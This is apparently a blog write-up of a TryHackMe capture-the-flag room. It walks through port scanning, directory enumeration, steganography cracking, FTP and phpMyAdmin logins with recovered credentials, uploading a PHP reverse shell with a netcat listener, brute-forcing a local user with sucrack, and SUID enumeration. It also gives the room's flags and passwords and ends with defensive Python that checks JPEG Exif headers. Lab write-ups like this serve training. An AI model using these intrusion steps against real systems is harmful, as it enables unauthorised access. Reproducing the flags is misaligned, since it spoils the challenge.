Different CTF from TryHackMe
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researcher || TryHackMe Top 1% || Programming C, Python || Bug Bounty ||
A hard THM challenge: steganography, database handling, FTP, WordPress CMS and brute-forcing. This room has everything.
Port Scanning
Scan the machine for open ports with rustscan:
rustscan -a 10.10.154.178 -- -A
Two ports are open: 21 and 80.
1 - How many ports are open?
Ans. 2
Web Enumeration
Then I went to port 80. A website is hosted there, but it renders broken.
Next, a source code review, then adding the hostname to /etc/hosts:
vim /etc/hosts
Then I ran gobuster and found the hidden directory:
gobuster dir -u https://adana.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/phpmyadmin
/wp-admin
/announcements
I found a wordlist file and an image there and downloaded both.
What is the name of the secret directory?
Ans. /announcements
Steghide
Interesting. strings and binwalk showed nothing, but steghide prompts for a passphrase.
Time to use stegseek:
Then log in to FTP:
USER: hakanftp
PASS: 123adanacrack
I downloaded wp-config.php with the get command.
In it I found the credentials Username:Password = phpmyadmin:12345.
Log in to phpMyAdmin, open the phpmyadmin1 database and then the wp_options table; there we find the subdomain.
Then add the subdomain to /etc/hosts:
vim /etc/hosts
I uploaded a PHP reverse shell (reverseshell.php) over FTP with the put command, then chmod 777 reverseshell.php.
Then start a listener with nc -lvnp 8080 and visit https://subdomain.adana.thm
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /var/www/html
cat wwe3bbfla4g.txt
Web flag?
Ans. THM{343a7e2064a1d992c01ee201c346edff}
There is another user on the box, but we have no permissions as www-data.
We have a shell now. I can’t become root from it, but I noticed a user named hakanbey. We can crack this user’s password with the sucrack tool (sucrack brute-forces user passwords on the server itself via su). Now we can transfer sucrack to the compromised machine with a Python HTTP server: install sucrack, go to the /usr/bin directory (because packages are in this directory) and start the Python HTTP server.
git clone https://github.com/hemp3l/sucrack.git
tar -czvf source-sucrack.tar.gz ./sucrack
ftp> put source-sucrack.tar.gz
local: source-sucrack.tar.gz remote: source-sucrack.tar.gz
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
321789 bytes sent in 0.09 secs (3.3806 MB/s)
ftp> put wordlist.txt
local: wordlist.txt remote: wordlist.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
403891 bytes sent in 0.12 secs (3.1115 MB/s)
ftp> chmod 777 source-sucrack.tar.gz
200 SITE CHMOD command ok.
ftp> chmod 777 wordlist.txt
200 SITE CHMOD command ok.
www-data@ubuntu:/$ mv /var/www/subdomain/source-sucrack.tar.gz /tmp
www-data@ubuntu:/$ mv /var/www/subdomain/wordlist.txt /tmp
www-data@ubuntu:/$ cd /tmp
www-data@ubuntu:/tmp$ tar xfz source-sucrack.tar.gz
www-data@ubuntu:/tmp$ cd sucrack/
www-data@ubuntu:/tmp/sucrack$ ./configure
make
I realised that 123adana is a prefix we saw in the passwords above. Maybe this password starts with it too? I looked for it in the list and there was only one match, which did not work. So I prepended the prefix to every word in the list:
sed 's/^/123adana/' wordlist.txt > wordlist2.txt
mv wordlist2.txt /tmp/sucrack/src
cd /home/hakanbey/
hakanbey@ubuntu:~$ cat user.txt
User flag?
Ans. THM{8ba9d7715fe726332b7fc9bd00e67127}
Privilege Escalation
find / -perm -4000 -type f 2>/dev/null
The SUID file /usr/bin/binary is interesting. Let’s execute /usr/bin/binary and examine its output.
I also transferred this file to my machine for analysis.
The binary’s output contains a hint: Hexeditor 00000020.
So open root.jpg in a hex editor and look at offset 00000020:
cp /home/hakanbey/root.jpg /var/www/subdomain
In the FTP session, ls now shows root.jpg:
get root.jpg
xxd -l 50 root.jpg
00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 0060 ......JFIF.....`
00000010: 0060 0000 ffe1 0078 4578 6966 0000 4d4d .`.....xExif..MM
00000020: fee9 9d3d 7918 5ffc 826d df1c 69ac c275 ...=y._..m..i..u
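As an added forensic check (example code, not from the original writeup), the Python below walks a JPEG's segment headers and validates the Exif TIFF header, which is how an analyst can spot data planted in image metadata like the bytes at 00000020 above. The sample input is constructed from the xxd dump of root.jpg; only 0x30 bytes are reproduced on the page, so the APP1 segment is zero-padded to its declared length of 0x78.

```python
# Constructed from the xxd dump of root.jpg on this page (first 0x30 bytes).
SAMPLE_HEAD = bytes.fromhex(
    "ffd8"                                        # SOI
    "ffe0 0010 4a46494600 010101 0060 0060 0000"  # APP0 / JFIF
    "ffe1 0078 457869660000"                      # APP1, "Exif\0\0"
    "4d4d"                                        # TIFF byte order "MM"
    "fee9 9d3d 7918 5ffc 826d df1c 69ac c275"     # offset 0x20: 00 2a expected
)
APP1_END = 0x14 + 2 + 0x78                        # declared end of the APP1 segment
SAMPLE_JPEG = SAMPLE_HEAD + b"\x00" * (APP1_END - len(SAMPLE_HEAD))


def walk_segments(data):
    """Yield (marker, offset, length) for each marker segment up to SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker: not a JPEG")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset 0x{pos:x}")
        marker = data[pos + 1]
        if marker == 0xD9:                             # EOI
            return
        if marker == 0xD8 or 0xD0 <= marker <= 0xD7:   # standalone markers, no length
            pos += 2
            continue
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        yield marker, pos, length
        if marker == 0xDA:                             # SOS: entropy-coded data follows
            return
        pos += 2 + length


def check_exif_header(data):
    """Return [(offset, problem)] for APP1/Exif segments whose TIFF header is
    malformed. A clean one reads 'Exif\\0\\0' then 'II' + 2a00 or 'MM' + 002a."""
    findings = []
    for marker, pos, length in walk_segments(data):
        payload = data[pos + 4:pos + 2 + length]
        if marker != 0xE1 or not payload.startswith(b"Exif\x00\x00"):
            continue
        tiff = pos + 4 + 6                             # file offset of the TIFF header
        order, magic = data[tiff:tiff + 2], data[tiff + 2:tiff + 4]
        if (order, magic) in ((b"II", b"\x2a\x00"), (b"MM", b"\x00\x2a")):
            continue
        findings.append((tiff + 2, f"TIFF magic {magic.hex()} after byte order {order!r}"))
    return findings


if __name__ == "__main__":
    for offset, problem in check_exif_header(SAMPLE_JPEG):
        print(f"0x{offset:08x}: {problem}")          # 0x00000020: TIFF magic fee9 ...
```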
Root flag?
Ans. THM{c5a9d3e4147a13cbd1ca24b014466a6c}